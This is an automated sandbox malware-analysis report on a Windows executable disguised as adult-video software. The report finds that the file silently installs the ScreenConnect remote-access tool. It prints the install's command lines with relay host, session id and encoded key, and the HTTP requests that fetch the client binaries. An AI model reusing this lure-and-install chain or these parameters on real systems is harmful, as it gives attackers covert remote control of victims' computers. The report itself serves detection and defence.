Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P0RN-vidz.Client.exe

Overview

General Information

Sample name:P0RN-vidz.Client.exe
Analysis ID:1579051
MD5:af0d6501f817b8769618c6cbca8b4f65
SHA1:c6f57c44cfe15d219beb066a2098367e8750c0d4
SHA256:2cbee0d0b19b59d5176a0c9da2385da30f5df66818da9be4614f2a7b7c888967
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • P0RN-vidz.Client.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\P0RN-vidz.Client.exe" MD5: AF0D6501F817B8769618C6CBCA8B4F65)
    • dfsvc.exe (PID: 3060 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7724 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" MD5: E1E1E3C901F0DEC41B87113165A30ACB)
        • ScreenConnect.ClientService.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1" MD5: 0282251F1E4AF3F721D7192118A8FD2F)
    • WerFault.exe (PID: 5376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3376 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 1124 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7804 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1" MD5: 0282251F1E4AF3F721D7192118A8FD2F)
    • ScreenConnect.WindowsClient.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe" "RunRole" "1cec62b5-23ad-4984-ac47-8ca096d23ddd" "User" MD5: E1E1E3C901F0DEC41B87113165A30ACB)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            0000000A.00000002.2530078274.000000001B8E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                10.0.ScreenConnect.WindowsClient.exe.c50000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 3060, Protocol: tcp, SourceIp: 147.75.81.6, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3376, ProcessName: svchost.exe

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exeJump to behavior
                  Uses 32bit PE files
                  Source: P0RN-vidz.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: P0RN-vidz.Client.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 147.75.81.6:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: P0RN-vidz.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: P0RN-vidz.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26ECB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26B68000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2523805128.0000000002BE2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279854625.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279616010.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2517771786.000000000008D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D14000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530636996.000000001BEC2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26B6C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2524088311.0000000005242000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00374B9B FindFirstFileExA,0_2_00374B9B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\Jump to behavior

                  Networking

                  barindex
                  Enables network access during safeboot for specific services
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140 HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140 HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: koidesfac.screenconnect.comAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: koidesfac.screenconnect.com
                  Source: global trafficDNS traffic detected: DNS query: instance-l7g4dh-relay.screenconnect.com
                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3279734727.000001CCF815F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000002.3280179068.000001CCF865A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289529280.000001CCF8184000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2061645464.000001CCF8153000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF812F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2289512166.000001CCF8132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3278676068.000001CCF78B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280613817.000001CCF86B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
